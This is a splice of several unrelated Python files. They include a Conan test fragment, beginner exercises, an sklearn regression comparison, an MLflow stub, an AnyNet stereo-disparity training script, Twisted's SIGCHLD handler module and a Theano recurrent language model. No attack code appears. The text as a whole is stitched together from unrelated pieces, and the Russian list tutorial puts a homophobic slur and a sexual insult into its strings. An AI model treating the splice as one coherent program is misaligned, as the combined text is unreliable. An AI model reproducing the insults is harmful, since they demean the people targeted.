        """ should use configured URL in conan.conf
        """
        # No config_install recorded and no argument given -> error.
        error = self.client.run("config install", ignore_error=True)
        self.assertTrue(error)
        self.assertIn("Called config install without arguments", self.client.out)
|
'''
print below pattern
3 * 1 = 3
3 * 2 = 6
3 * 3 = 9
3 * 4 = 12
3 * 5 = 15
3 * 6 = 18
3 * 7 = 21
3 * 8 = 24
3 * 9 = 27
3 * 10 = 30
'''
def print_pattern_14(n, upto=10):
    """Print the multiplication table of *n*, one line per multiplier.

    Each line has the form "n * i = n*i" for i from 1 to *upto*
    (default 10, preserving the original behavior).

    Args:
        n: the number whose table is printed.
        upto: highest multiplier, inclusive (generalizes the previously
            hard-coded 10).
    """
    for i in range(1, upto + 1):
        # f-string replaces the original chain of str() concatenations.
        print(f"{n} * {i} = {n * i}")


print_pattern_14(3)
import os
from pyutil.program.jsonconf import parse

# Load the deployment configuration from ../config/deploy.json, resolved
# relative to this module so the cwd does not matter.
conf = parse(os.path.normpath(os.path.join(os.path.dirname(__file__), '../config/deploy.json')))
|
import pandas as pd
from sklearn.model_selection import cross_val_score
from sklearn.model_selection import KFold
from sklearn.linear_model import LinearRegression
from sklearn.linear_model import Ridge
from sklearn.linear_model import Lasso
from sklearn.linear_model import ElasticNet
import matplotlib.pyplot as plt

# Read Data -- Boston housing dataset, whitespace-delimited, no header.
url = 'https://goo.gl/sXleFv'
names = ['CRIM', 'ZN', 'INDUS', 'CHAS', 'NOX', 'RM', 'AGE', 'DIS', 'RAD', 'TAX', 'PTRATIO',
         'B', 'LSTAT', 'MEDV']
data = pd.read_csv(url, delim_whitespace=True, names=names)

# Feature - Target Split: columns 0-12 are features, MEDV (col 13) the target.
data_values = data.values
print(data.shape)
feature = data_values[:,0:13]
target = data_values[:,13]

# Models -- four linear regressors compared under identical CV folds.
models = []
models.append(('LinearRegression',LinearRegression()))
models.append(('Ridge',Ridge()))
models.append(('Lasso',Lasso()))
models.append(('ElasticNet',ElasticNet()))

# Cross Validation -- 10-fold R^2 score per model.
# NOTE(review): recent scikit-learn raises when random_state is set on
# KFold without shuffle=True; this call presumably targets an older
# version -- confirm, or add shuffle=True.
results =[]
names =[]
for name, model in models:
    kfold = KFold(n_splits=10, random_state = 7)
    cv_results = cross_val_score(model, feature, target, cv=kfold , scoring = "r2")
    results.append(cv_results)
    names.append(name)
    msg = "%s: %f (%f)" % (name, cv_results.mean(), cv_results.std())
    print(msg)

# Algorithm comparison -- box plot of the per-fold scores for each model.
fig = plt.figure()
fig.suptitle('Algorithm Comparison')
ax = fig.add_subplot(111)
plt.boxplot(results)
ax.set_xticklabels(names)
plt.show()
# Ques-4 Write a Python program to sort a list of dictionaries using Lambda.
# Sort the phone records in ascending order of their 'model' value.
phones = [{'make': 'Nokia', 'model': 216, 'color': 'Black'}, {'make': 'Mi Max', 'model': 2,'color': 'Gold'}, {'make': 'Samsung', 'model': 7, 'color': 'Blue'}]
sort_l = sorted(phones, key=lambda phone: phone['model'])
print(sort_l)
|
import mlflow
def logModel(model):
    """Log *model* to the active MLflow run as a generic pyfunc artifact
    under the artifact path "model"."""
    mlflow.pyfunc.log_model(artifact_path="model",python_model=model)
    # mlflow.pyfunc.save_model(
    #         path=model_path,
    #         python_model=model,
    #         code_path=['multi_model.py'],
    #         conda_env={
    #             'channels': ['defaults', 'conda-forge'],
    #             'dependencies': [
    #                 'mlflow=1.2.0',
    #                 'numpy=1.16.5',
    #                 'python=3.6.9',
    #                 'scikit-learn=0.21.3',
    #                 'cloudpickle==1.2.2'
    #             ],
    #             'name': 'mlflow-env'
    #         }
    #     )
def loadModel(model):
    """Placeholder: will wrap mlflow.pyfunc.load_model once implemented."""
    pass
# we don't have predefined pkg to save LDA model. so we need to use generic pyfunc
def saveModel(model):
    """Placeholder: will wrap mlflow.pyfunc.save_model once implemented."""
    pass
|
import argparse
import os
import torch
import torch.nn as nn
import torch.nn.parallel
import torch.optim as optim
import torch.utils.data
import torch.nn.functional as F
import time
import numpy as np
import pdb
import cv2
# import imageio
import utils.logger as logger
import models.anynet
# Command-line configuration for AnyNet stereo-matching training.
parser = argparse.ArgumentParser(description='AnyNet with Flyingthings3d')
parser.add_argument('--maxdisp', type=int, default=192, help='maxium disparity')
parser.add_argument('--loss_weights', type=float, nargs='+', default=[0.25, 0.5, 1., 1.])
parser.add_argument('--maxdisplist', type=int, nargs='+', default=[12, 3, 3])
parser.add_argument('--datapath', default=None,
                    help='datapath')
parser.add_argument('--datatype', default='carla',
                    help='datapath')
parser.add_argument('--epochs', type=int, default=10,
                    help='number of epochs to train')
parser.add_argument('--train_bsize', type=int, default=6,
                    help='batch size for training (default: 6)')
parser.add_argument('--test_bsize', type=int, default=1,
                    help='batch size for testing (default: 4)')
parser.add_argument('--save_path', type=str, default='results/pretrained_anynet',
                    help='the path of saving checkpoints and log')
parser.add_argument('--resume', type=str, default='results/pretrained_anynet',
                    help='resume path')
parser.add_argument('--lr', type=float, default=5e-4,
                    help='learning rate')
parser.add_argument('--with_spn', action='store_true', help='with spn network or not')
parser.add_argument('--print_freq', type=int, default=5, help='print frequence')
parser.add_argument('--init_channels', type=int, default=1, help='initial channels for 2d feature extractor')
parser.add_argument('--nblocks', type=int, default=2, help='number of layers in each stage')
parser.add_argument('--channels_3d', type=int, default=4, help='number of initial channels of the 3d network')
parser.add_argument('--layers_3d', type=int, default=4, help='number of initial layers of the 3d network')
parser.add_argument('--growth_rate', type=int, nargs='+', default=[4,1,1], help='growth rate in the 3d network')
parser.add_argument('--spn_init_channels', type=int, default=8, help='initial channels for spnet')
args = parser.parse_args()
# Import only the selected dataset backend; note that --datapath is
# overridden here with the dataset's hard-coded location.
if args.datatype == 'kitti':
    from dataloader import KITTILoader as DA
    from dataloader import KITTIloader2015 as lt
    args.datapath = 'kitti/training/'
elif args.datatype == 'carla':
    from dataloader import CarlaLoader as DA
    from dataloader import CarlaSplit as lt
    args.datapath = '/data/cli/carla_0.9.6_data/'
def main():
    """Build data loaders, construct AnyNet, optionally resume from a
    checkpoint, then train for `args.epochs` epochs and run a final test."""
    global args
    train_left_img, train_right_img, train_left_disp, test_left_img, test_right_img, test_left_disp = lt.dataloader(
        args.datapath)
    TrainImgLoader = torch.utils.data.DataLoader(
        DA.myImageFloder(train_left_img, train_right_img, train_left_disp, True),
        batch_size=args.train_bsize, shuffle=True, num_workers=4, drop_last=False)
    TestImgLoader = torch.utils.data.DataLoader(
        DA.myImageFloder(test_left_img, test_right_img, test_left_disp, False),
        batch_size=args.test_bsize, shuffle=False, num_workers=4, drop_last=False)
    if not os.path.isdir(args.save_path):
        os.makedirs(args.save_path)
    log = logger.setup_logger(args.save_path + '/training.log')
    # Record the full configuration at the top of the log for reproducibility.
    for key, value in sorted(vars(args).items()):
        log.info(str(key) + ': ' + str(value))
    model = models.anynet.AnyNet(args)
    # pdb.set_trace()
    model = nn.DataParallel(model).cuda()
    optimizer = optim.Adam(model.parameters(), lr=args.lr, betas=(0.9, 0.999))
    log.info('Number of model parameters: {}'.format(sum([p.data.nelement() for p in model.parameters()])))
    args.start_epoch = 0
    # NOTE(review): --resume defaults to a directory path, but os.path.isfile
    # expects a checkpoint file -- the default silently falls into the
    # "no checkpoint found" branch.  Confirm intended usage.
    if args.resume:
        if os.path.isfile(args.resume):
            log.info("=> loading checkpoint '{}'".format(args.resume))
            checkpoint = torch.load(args.resume)
            args.start_epoch = checkpoint['epoch']
            model.load_state_dict(checkpoint['state_dict'])
            optimizer.load_state_dict(checkpoint['optimizer'])
            log.info("=> loaded checkpoint '{}' (epoch {})"
                     .format(args.resume, checkpoint['epoch']))
        else:
            log.info("=> no checkpoint found at '{}'".format(args.resume))
            log.info("=> Will start from scratch.")
    else:
        log.info('Not Resume')
    start_full_time = time.time()
    for epoch in range(args.start_epoch, args.epochs):
        log.info('This is {}-th epoch'.format(epoch))
        train(TrainImgLoader, model, optimizer, log, epoch)
        # Checkpoint after every epoch (file is overwritten each time).
        savefilename = args.save_path + '/checkpoint.tar'
        torch.save({
            'epoch': epoch,
            'state_dict': model.state_dict(),
            'optimizer': optimizer.state_dict(),
        }, savefilename)
    test(TestImgLoader, model, log)
    log.info('full training time = {:.2f} Hours'.format((time.time() - start_full_time) / 3600))
def add_afm_hook(module):
    """Register a forward hook that keeps a running mean of the module's
    output in `module._afm` (the number of updates is in `module._afm_k`)."""
    def _running_mean_hook(mod, _inputs, out):
        if not hasattr(mod, '_afm_k'):
            # First forward pass: seed the mean with the raw output.
            mod._afm_k = 0
            mod._afm = out
            mod._bytetype = 0
            return
        mod._afm_k += 1
        count = mod._afm_k
        total = count + 1.
        # Incremental mean: new = k/(k+1) * old + out/(k+1).
        mod._afm = (count / total * mod._afm) + (out / total)
    module.register_forward_hook(_running_mean_hook)
def save_afm(module, dir='./'):
    """Saves `module._afm` to disk, in dir"""
    # NOTE(review): the path is dir + ".pth", so `dir` is expected to already
    # contain the file stem (e.g. "output/vis/3" -> "output/vis/3.pth").
    path = "{}{}".format(dir, ".pth")
    # Move off the GPU before serialising/visualising.
    afm = module._afm.cpu()
    torch.save(afm, path)
    vis_afm(afm, dir)
def vis_afm_signed(fm, dir='./', colormap=cv2.COLORMAP_HOT, fname='out'):
    """Color-map `fm` and write it to `<dir>/<fname>.jpg`, creating `dir`."""
    os.makedirs(dir, exist_ok=True)
    out_path = os.path.join(dir, "{}.jpg".format(fname))
    colored = normalize_fm(fm, colormap)
    cv2.imwrite(out_path, colored)
def vis_afm_negative(fm, dir='./', fname='out'):
    """Visualise the negative part of `fm` into `<dir>_neg` (ocean colormap)."""
    negative_part = np.maximum(0, -fm)
    vis_afm_signed(negative_part, dir + "_neg", cv2.COLORMAP_OCEAN, fname)
def vis_afm_positive(fm, dir='./', fname='out'):
    """Visualise the positive part of `fm` into `<dir>_pos` (hot colormap)."""
    positive_part = np.maximum(0, fm)
    vis_afm_signed(positive_part, dir + "_pos", cv2.COLORMAP_HOT, fname)
def normalize_fm(fm, colormap):
    """Scale `fm` into [0, 255], cast to uint8 and apply an OpenCV colormap.

    Returns a new BGR image; the caller's array is not mutated.  An all-zero
    (or non-positive) map renders as black instead of dividing by zero and
    producing NaNs like the previous in-place version did.
    """
    peak = fm.max()
    if peak > 0:
        # Work on a scaled copy rather than mutating the caller's array.
        fm = fm * (255.0 / peak)
    fm = fm.astype(np.uint8)
    return cv2.applyColorMap(fm, colormap)
def vis_afm(afm, dir='./', vis_functions=(vis_afm_positive, vis_afm_negative)):
    """Render every channel of the first batch element of `afm`, running each
    visualiser in `vis_functions` with the channel index as the file stem."""
    for idx, chan in enumerate(afm[0]):
        chan_np = chan.data.numpy()
        for vis_fn in vis_functions:
            vis_fn(chan_np, dir, idx)
def add_all_afm_hooks(net):
    """Attach running-mean hooks to every tracked layer of net's first child."""
    root = list(net.children())[0]
    for tracked_layer in get_all_afm_layers(root):
        add_afm_hook(tracked_layer)
# for m in net:
# if isinstance(m, nn.Conv2d):
# add_afm_hook(m)
def save_all_afm(net, dir='./'):
    """Dump every tracked layer's averaged feature map under output/vis/<idx>."""
    # NOTE(review): the `dir` parameter is ignored; output paths are
    # hard-coded to output/vis.
    os.makedirs('output/vis', exist_ok=True)
    for name, layer in enumerate(get_all_afm_layers(list(net.children())[0])):
        try:
            save_afm(layer, dir=os.path.join('output/vis', str(name)))
            print(layer)
        except cv2.error:
            # Visualisation can fail on degenerate maps; log and keep going.
            print('error')
            print(layer)
def get_all_afm_layers(net):
    """Return generator for layers, pulling out all Conv2d and BatchNorm2d layers."""
    if isinstance(net, (torch.nn.Conv2d, torch.nn.BatchNorm2d)):
        yield net
        return
    children = list(net.children())
    if not children:
        # Leaf layer we don't track for afm, e.g. Linear or ReLU.
        return
    for child in children:
        yield from get_all_afm_layers(child)
#for nbranches, s, stage in (
# (2, 2, net.stage2),
# (3, 3, net.stage3),
# (4, 4, net.stage4)):
# for b in range(nbranches):
# yield 'stg{}_br{}_convbn1'.format(s, b), \
# stage[0].branches[b][0].bn1
# yield 'stg{}_br{}_convbn2'.format(s, b), \
# stage[0].branches[b][0].bn2
# yield 'stg{}_br{}_conv1'.format(s, b), \
# stage[0].branches[b][0].conv1
# yield 'stg{}_br{}_conv2'.format(s, b), \
# stage[0].branches[b][0].conv2
# for m in net:
# if isinstance(m, nn.Conv2d):
# save_afm(m, dir=dir)
def train(dataloader, model, optimizer, log, epoch=0):
    """Run one training epoch, logging per-stage smooth-L1 disparity losses."""
    # One loss term per AnyNet stage (+1 when the SPN refinement stage is on).
    stages = 3 + args.with_spn
    losses = [AverageMeter() for _ in range(stages)]
    length_loader = len(dataloader)
    model.train()
    for batch_idx, (imgL, imgR, disp_L) in enumerate(dataloader):
        imgL = imgL.float().cuda()
        imgR = imgR.float().cuda()
        disp_L = disp_L.float().cuda()
        optimizer.zero_grad()
        # Supervise only pixels whose ground-truth disparity is in range.
        mask = disp_L < args.maxdisp
        mask.detach_()
        outputs = model(imgL, imgR)
        outputs = [torch.squeeze(output, 1) for output in outputs]
        # NOTE(review): size_average= is deprecated in newer torch versions
        # (use reduction='mean') -- confirm the pinned torch version.
        loss = [args.loss_weights[x] * F.smooth_l1_loss(outputs[x][mask], disp_L[mask], size_average=True)
                for x in range(stages)]
        sum(loss).backward()
        optimizer.step()
        for idx in range(stages):
            # Un-weight so the logged numbers are comparable across stages.
            losses[idx].update(loss[idx].item()/args.loss_weights[idx])
        if batch_idx % args.print_freq == 0:
            info_str = ['Stage {} = {:.2f}({:.2f})'.format(x, losses[x].val, losses[x].avg) for x in range(stages)]
            info_str = '\t'.join(info_str)
            log.info('Epoch{} [{}/{}] {}'.format(
                epoch, batch_idx, length_loader, info_str))
    info_str = '\t'.join(['Stage {} = {:.2f}'.format(x, losses[x].avg) for x in range(stages)])
    log.info('Average train loss = ' + info_str)
def test(dataloader, model, log):
    """Evaluate end-point error (EPE) per stage and dump averaged feature maps."""
    stages = 3 + args.with_spn
    EPEs = [AverageMeter() for _ in range(stages)]
    length_loader = len(dataloader)
    model.eval()
    # Collect running-mean activations during evaluation (saved at the end).
    add_all_afm_hooks(model)
    for batch_idx, (imgL, imgR, disp_L) in enumerate(dataloader):
        start = time.time()
        imgL = imgL.float().cuda()
        imgR = imgR.float().cuda()
        disp_L = disp_L.float().cuda()
        # Only pixels with in-range ground truth count toward the EPE.
        mask = disp_L < args.maxdisp
        with torch.no_grad():
            outputs = model(imgL, imgR)
            for x in range(stages):
                if len(disp_L[mask]) == 0:
                    # No valid pixels in this batch: record a zero EPE.
                    EPEs[x].update(0)
                    continue
                output = torch.squeeze(outputs[x], 1)
                # output = output[:, 4:, :]
                # result = (np.array(output.cpu())[0]).astype(np.uint8)
                # imageio.imwrite("result-id{}-stage{}.png".format(batch_idx, x), result)
                # print("Mask matched")
                EPEs[x].update((output[mask] - disp_L[mask]).abs().mean())
                # gt = (np.array(disp_L[0])*255).astype(np.uint8)
                # imageio.imwrite("gt-id{}.png".format(batch_idx), gt)
        end = time.time()
        # print(end-start)
        info_str = '\t'.join(['Stage {} = {:.2f}({:.2f})'.format(x, EPEs[x].val, EPEs[x].avg) for x in range(stages)])
        log.info('[{}/{}] {}'.format(
            batch_idx, length_loader, info_str))
    save_all_afm(model)
    info_str = ', '.join(['Stage {}={:.2f}'.format(x, EPEs[x].avg) for x in range(stages)])
    log.info('Average test EPE = ' + info_str)
class AverageMeter(object):
    """Tracks the most recent value plus a running sum, count and average."""

    def __init__(self):
        self.reset()

    def reset(self):
        """Clear all statistics back to zero."""
        self.val = 0
        self.avg = 0
        self.sum = 0
        self.count = 0

    def update(self, val, n=1):
        """Record `val` observed `n` times and refresh the running average."""
        self.val = val
        self.count += n
        self.sum += val * n
        self.avg = self.sum / self.count
# Script entry point: train, checkpoint and evaluate AnyNet.
if __name__ == '__main__':
    main()
|
# -*- test-case-name: twisted.internet.test.test_sigchld -*-
# Copyright (c) Twisted Matrix Laboratories.
# See LICENSE for details.
"""
This module is used to integrate child process termination into a
reactor event loop. This is a challenging feature to provide because
most platforms indicate process termination via SIGCHLD and do not
provide a way to wait for that signal and arbitrary I/O events at the
same time. The naive implementation involves installing a Python
SIGCHLD handler; unfortunately this leads to other syscalls being
interrupted (whenever SIGCHLD is received) and failing with EINTR
(which almost no one is prepared to handle). This interruption can be
disabled via siginterrupt(2) (or one of the equivalent mechanisms);
however, if the SIGCHLD is delivered by the platform to a non-main
thread (not a common occurrence, but difficult to prove impossible),
the main thread (waiting on select() or another event notification
API) may not wake up leading to an arbitrary delay before the child
termination is noticed.
The basic solution to all these issues involves enabling SA_RESTART
(ie, disabling system call interruption) and registering a C signal
handler which writes a byte to a pipe. The other end of the pipe is
registered with the event loop, allowing it to wake up shortly after
SIGCHLD is received. See L{twisted.internet.posixbase._SIGCHLDWaker}
for the implementation of the event loop side of this solution. The
use of a pipe this way is known as the U{self-pipe
trick<http://cr.yp.to/docs/selfpipe.html>}.
From Python version 2.6, C{signal.siginterrupt} and C{signal.set_wakeup_fd}
provide the necessary C signal handler which writes to the pipe to be
registered with C{SA_RESTART}.
"""
from __future__ import division, absolute_import
import signal
def installHandler(fd):
    """
    Install a signal handler which will write a byte to C{fd} when
    I{SIGCHLD} is received.

    This is implemented by installing a SIGCHLD handler that does nothing,
    setting the I{SIGCHLD} handler as not allowed to interrupt system calls,
    and using L{signal.set_wakeup_fd} to do the actual writing.  Passing
    C{-1} restores the default I{SIGCHLD} disposition.

    @param fd: The file descriptor to which to write when I{SIGCHLD} is
        received.
    @type fd: C{int}
    """
    if fd != -1:
        # The Python-level handler is deliberately a no-op; the real wake-up
        # is the byte written to fd by set_wakeup_fd below.
        signal.signal(signal.SIGCHLD, lambda *unused: None)
        # Keep syscalls restartable so SIGCHLD does not surface as EINTR.
        signal.siginterrupt(signal.SIGCHLD, False)
    else:
        signal.signal(signal.SIGCHLD, signal.SIG_DFL)
    return signal.set_wakeup_fd(fd)
def isDefaultHandler():
    """
    Determine whether the I{SIGCHLD} handler is the default or not.
    """
    current = signal.getsignal(signal.SIGCHLD)
    return current == signal.SIG_DFL
|
first_name = "Eric"
question = ", would you like to learn some Python today?"
print(first_name.upper() +question)
my_14 = 14
print("Мое л число " + str(my_14)) #str() converts a number to its string form; the variable goes inside the parentheses
#lists
#Name lists in the plural, e.g. cycleS
#variable name cycles = then square brackets listing the elements, e.g.:
#cycles = ['trek', 'redline']
cycles = ['trek', 'redline', 'cannon']
print(cycles)
#list indexing starts at 0: print(cycles[0])
print(cycles[0])
print(cycles[0].title()) #title() capitalizes the first letter
print(cycles[-1].upper()) #index -1 returns the last element, -2 the one before it (upper() added)
print("Мой первый велосипед был "+cycles[-1].upper()+".") #pulling a list value into a message
#changing a list element
motorcycles = ['honda', 'yamaha', 'suzuki']
print(motorcycles)
motorcycles[0] = 'yokohama' #the element index goes before the assignment
print(motorcycles[0])
#appending an element to the end of a list
motorcycles.append('ducatti')
print(motorcycles)
#building a list by appending
motorcycles = []
motorcycles.append('gnoy')
motorcycles.append('cherv')
print(motorcycles)
#inserting into a list with insert(position, value)
motorcycles = ['honda', 'suzuki', 'yoko']
motorcycles.insert(0, 'ducatti')
print(motorcycles)
#deleting from a list
del motorcycles[2]
print(motorcycles)
#removal with further use: pop() removes and returns the last element
motorcycles = ['honda', 'suzuki', 'ducatti']
motorcycles_popped = motorcycles.pop()
print(motorcycles)
print(motorcycles_popped)
#removal by element VALUE
motorcycles = ['honda', 'suzuki', 'bmw']
motorcycles.remove('suzuki')
print(motorcycles)
#removal by value, keeping the value for later use
motorcycles = ['honda', 'suzuki', 'bmw']
print(motorcycles[0].title())
too_expensive = 'bmw'
motorcycles.remove(too_expensive)
print("\nA " +too_expensive.title()+" для педиков")
#exercise
gosti = ['masha', 'petya','klava','ivan']
print(gosti)
priglashenie = "Всем быстро собраться"
print(priglashenie+" " +gosti[0].title())
print(priglashenie+" " +gosti[1].title())
print(priglashenie+" " +gosti[2].title())
ne_prishla = 'ivan'
gosti.remove(ne_prishla)
print(gosti)
print(ne_prishla)
gosti.append('volodya')
print(gosti)
gosti.insert(0, 'begemot')
gosti.insert(3, 'shalava')
gosti.append('gnome')
print(gosti)
###Sorting: list.sort()
gosti.sort()
print(gosti)
###Reverse sorting: .sort(reverse=True)
gosti.sort(reverse=True)
print(gosti)
###Temporary sorting (DOES NOT modify the list)
print(sorted(gosti,reverse=True))
###len() returns the number of items in a list
print(len(gosti))
############Exercise#############
strany = ['tunis', 'turciya', 'canada', 'belgiya', 'germaniya']
strany.sort()
print(strany)
|
"""
General class for a recurrent language model
"""
__docformat__ = 'restructedtext en'
__authors__ = ("Alessandro Sordoni, Iulian Vlad Serban")
__contact__ = "Alessandro Sordoni <sordonia@iro.umontreal>"
import theano
import theano.tensor as T
import numpy as np
import cPickle
import logging
import operator
logger = logging.getLogger(__name__)
from theano.sandbox.rng_mrg import MRG_RandomStreams
from theano.tensor.shared_randomstreams import RandomStreams
from collections import OrderedDict
from model import *
from utils import *
# Theano speed-up
theano.config.scan.allow_gc = False
#
def add_to_params(params, new_param):
    """Append `new_param` to `params` and hand it back so creation and
    registration of a shared variable fit on one line."""
    params.append(new_param)
    return new_param
class ComponentBase():
    """Base class for model components: stores RNGs and parent, copies every
    `state` entry onto the instance, and starts an empty parameter list."""
    def __init__(self, state, rng, parent):
        patience = state['patience']
        self.rng = rng
        # Theano-side RNG, seeded from the numpy RNG (seed forced >= 1).
        self.trng = MRG_RandomStreams(max(self.rng.randint(2 ** 15), 1))
        self.parent = parent
        self.state = state
        # Expose every state entry as an attribute (e.g. self.qdim, self.idim).
        self.__dict__.update(state)
        # NOTE(review): eval() of a config-supplied string -- fine for trusted
        # configs, unsafe if `state` can ever come from untrusted input.
        self.rec_activation = eval(self.rec_activation)
        self.params = []
class LanguageModel(ComponentBase):
    """Recurrent (plain-RNN or GRU-gated) word-level language model in Theano.

    The mode constants below select what build_lm computes: per-target
    probabilities (TRAINING/EVALUATION), the softmax over the vocabulary
    (BEAM_SEARCH) or sampled tokens (SAMPLING).
    """
    TRAINING = 0
    EVALUATION = 1
    SAMPLING = 2
    BEAM_SEARCH = 3
    def init_params(self):
        """Create all shared variables: embeddings, recurrent and output weights."""
        ###################
        # RECURRENT WEIGHTS
        ###################
        # Build word embeddings, which are shared throughout the model
        if self.initialize_from_pretrained_word_embeddings:
            # Load pretrained word embeddings from pickled file
            logger.debug("Loading pretrained word embeddings")
            pretrained_embeddings = cPickle.load(open(self.pretrained_word_embeddings_file, 'r'))
            # Check all dimensions match from the pretrained embeddings
            print 'pretrained_embeddings[0].shape', pretrained_embeddings[0].shape
            assert(self.idim == pretrained_embeddings[0].shape[0])
            assert(self.rankdim == pretrained_embeddings[0].shape[1])
            assert(self.idim == pretrained_embeddings[1].shape[0])
            assert(self.rankdim == pretrained_embeddings[1].shape[1])
            # NOTE(review): `numpy` (vs the `np` alias imported above) must be
            # supplied by the star imports from model/utils -- verify.
            self.W_emb_pretrained_mask = theano.shared(pretrained_embeddings[1].astype(numpy.float32), name='W_emb_mask')
            self.W_emb = add_to_params(self.params, theano.shared(value=pretrained_embeddings[0].astype(numpy.float32), name='W_emb'))
        else:
            # Initialize word embeddings randomly
            self.W_emb = add_to_params(self.params, theano.shared(value=NormalInit(self.rng, self.idim, self.rankdim), name='W_emb'))
        self.W_in = add_to_params(self.params, theano.shared(value=NormalInit(self.rng, self.rankdim, self.qdim), name='W_in'))
        self.W_hh = add_to_params(self.params, theano.shared(value=OrthogonalInit(self.rng, self.qdim, self.qdim), name='W_hh'))
        self.b_hh = add_to_params(self.params, theano.shared(value=np.zeros((self.qdim,), dtype='float32'), name='b_hh'))
        # Extra reset (r) and update (z) gate weights for the GRU-style step.
        if self.step_type == "gated":
            self.b_r = add_to_params(self.params, theano.shared(value=np.zeros((self.qdim,), dtype='float32'), name='b_r'))
            self.b_z = add_to_params(self.params, theano.shared(value=np.zeros((self.qdim,), dtype='float32'), name='b_z'))
            self.W_in_r = add_to_params(self.params, theano.shared(value=NormalInit(self.rng, self.rankdim, self.qdim), name='W_in_r'))
            self.W_in_z = add_to_params(self.params, theano.shared(value=NormalInit(self.rng, self.rankdim, self.qdim), name='W_in_z'))
            self.W_hh_r = add_to_params(self.params, theano.shared(value=OrthogonalInit(self.rng, self.qdim, self.qdim), name='W_hh_r'))
            self.W_hh_z = add_to_params(self.params, theano.shared(value=OrthogonalInit(self.rng, self.qdim, self.qdim), name='W_hh_z'))
        self.bd_out = add_to_params(self.params, theano.shared(value=np.zeros((self.idim,), dtype='float32'), name='bd_out'))
        self.Wd_emb = add_to_params(self.params, theano.shared(value=NormalInit(self.rng, self.idim, self.rankdim), name='Wd_emb'))
        ######################
        # Output layer weights
        ######################
        out_target_dim = self.qdim
        if not self.maxout_out:
            out_target_dim = self.rankdim
        self.Wd_out = add_to_params(self.params, theano.shared(value=NormalInit(self.rng, self.qdim, out_target_dim), name='Wd_out'))
        # Set up deep output
        if self.deep_out:
            self.Wd_e_out = add_to_params(self.params, theano.shared(value=NormalInit(self.rng, self.rankdim, out_target_dim), name='Wd_e_out'))
            self.bd_e_out = add_to_params(self.params, theano.shared(value=np.zeros((out_target_dim,), dtype='float32'), name='bd_e_out'))
    def plain_step(self, x_t, h_tm1):
        """One vanilla RNN step: h_t = act(W_in x_t + W_hh h_{t-1} + b_hh)."""
        #### Handle the bias from the document
        h_t = T.dot(x_t, self.W_in) + T.dot(h_tm1, self.W_hh) + self.b_hh
        h_t = self.rec_activation(h_t)
        return h_t
    def gated_step(self, x_t, h_tm1):
        """One GRU step; returns h_t plus the gates / candidate for scan."""
        r_t = T.nnet.sigmoid(T.dot(x_t, self.W_in_r) + T.dot(h_tm1, self.W_hh_r) + self.b_r)
        z_t = T.nnet.sigmoid(T.dot(x_t, self.W_in_z) + T.dot(h_tm1, self.W_hh_z) + self.b_z)
        h_tilde = T.dot(x_t, self.W_in) + T.dot(r_t * h_tm1, self.W_hh) + self.b_hh
        h_tilde = self.rec_activation(h_tilde)
        # Interpolate between the previous state and the candidate.
        h_t = (np.float32(1.0) - z_t) * h_tm1 + z_t * h_tilde
        return h_t, r_t, z_t, h_tilde
    def approx_embedder(self, x):
        """Look up the embedding rows for token ids `x`."""
        return self.W_emb[x]
    def build_lm(self, x, y=None, mode=TRAINING, prev_h=None, step_num=None):
        """
        x is the input sequence
        y are the targets
        mode is the evaluation or sampling mode
        prev_h is used in the sampling mode
        step_num is the step number of decoding
        """
        one_step = False
        # Check parameter consistency
        if mode == LanguageModel.EVALUATION or mode == LanguageModel.TRAINING:
            assert y
        else:
            assert not y
            assert prev_h
            one_step = True
        # if x.ndim == 2 then
        # x = (n_steps, batch_size)
        if x.ndim == 2:
            batch_size = x.shape[1]
        # else x = (word_1, word_2, word_3, ...)
        # or x = (last_word_1, last_word_2, last_word_3, ..)
        # in this case batch_size is
        else:
            batch_size = 1
        if not prev_h:
            prev_h = T.alloc(np.float32(0.), batch_size, self.qdim)
        xe = self.approx_embedder(x)
        # Gated Encoder
        if self.step_type == "gated":
            f_enc = self.gated_step
            o_enc_info = [prev_h, None, None, None]
        else:
            f_enc = self.plain_step
            o_enc_info = [prev_h]
        # Run through all the sentence (encode everything)
        if not one_step:
            _res, _ = theano.scan(f_enc,
                              sequences=[xe],\
                              outputs_info=o_enc_info)
        # Make just one step further
        else:
            _res = f_enc(xe, prev_h)
        h = _res[0]
        # Store last h for further use
        pre_activ = self.output_layer(h, xe)
        # EVALUATION : Return target_probs
        # target_probs.ndim == 3
        outputs = self.output_softmax(pre_activ)
        if mode == LanguageModel.EVALUATION:
            target_probs = GrabProbs(outputs, y)
            return target_probs, h, outputs
        # BEAM_SEARCH : Return output (the softmax layer) + the new hidden states
        elif mode == LanguageModel.BEAM_SEARCH:
            return outputs, h
        # SAMPLING    : Return a vector of n_sample from the output layer
        #                 + log probabilities + the new hidden states
        elif mode == LanguageModel.SAMPLING:
            if outputs.ndim == 1:
                outputs = outputs.dimshuffle('x', 0)
            sample = self.trng.multinomial(pvals=outputs, dtype='int64').argmax(axis=-1)
            if outputs.ndim == 1:
                sample = sample[0]
            log_prob = -T.log(T.diag(outputs.T[sample]))
            return sample, log_prob, h
    def output_layer(self, h, x):
        """Pre-softmax projection of hidden states (optional deep-out / maxout)."""
        pre_activ = T.dot(h, self.Wd_out)
        if self.deep_out:
            pre_activ += T.dot(x, self.Wd_e_out) + self.bd_e_out
        if self.maxout_out:
            pre_activ = Maxout(2)(pre_activ)
        return pre_activ
    def output_softmax(self, pre_activ):
        """Softmax over the vocabulary via the output embedding matrix."""
        # returns a (timestep, bs, idim) matrix (huge)
        return SoftMax(T.dot(pre_activ, self.Wd_emb.T) + self.bd_out)
    def build_next_probs_predictor(self, x, prev_h, d=None):
        """Single-step softmax + next hidden state, used by beam search."""
        return self.build_lm(x, d, mode=LanguageModel.BEAM_SEARCH, prev_h=prev_h)
    def sampling_step(self, *args):
        """One scan step of the naive sampler; unpacks scan's flat arg list."""
        args = iter(args)
        # Arguments that correspond to scan's "sequences" parameteter:
        step_num = next(args)
        assert step_num.ndim == 0
        # Arguments that correspond to scan's "outputs" parameteter:
        prev_word = next(args)
        assert prev_word.ndim == 1
        # skip the previous word log probability
        log_prob = next(args)
        assert log_prob.ndim == 1
        prev_h = next(args)
        assert prev_h.ndim == 2
        # When we sample we shall recompute the lm for one step...
        sample, log_prob, h = self.build_lm(prev_word, prev_h=prev_h, step_num=step_num, mode=LanguageModel.SAMPLING)
        assert sample.ndim == 1
        assert log_prob.ndim == 1
        assert h.ndim == 2
        return [sample, log_prob, h]
    def build_sampler(self, n_samples, n_steps):
        """Build a scan that draws `n_samples` sequences of `n_steps` tokens."""
        # For the naive sampler, the states are:
        # 1) a vector [<s>] * n_samples to seed the sampling
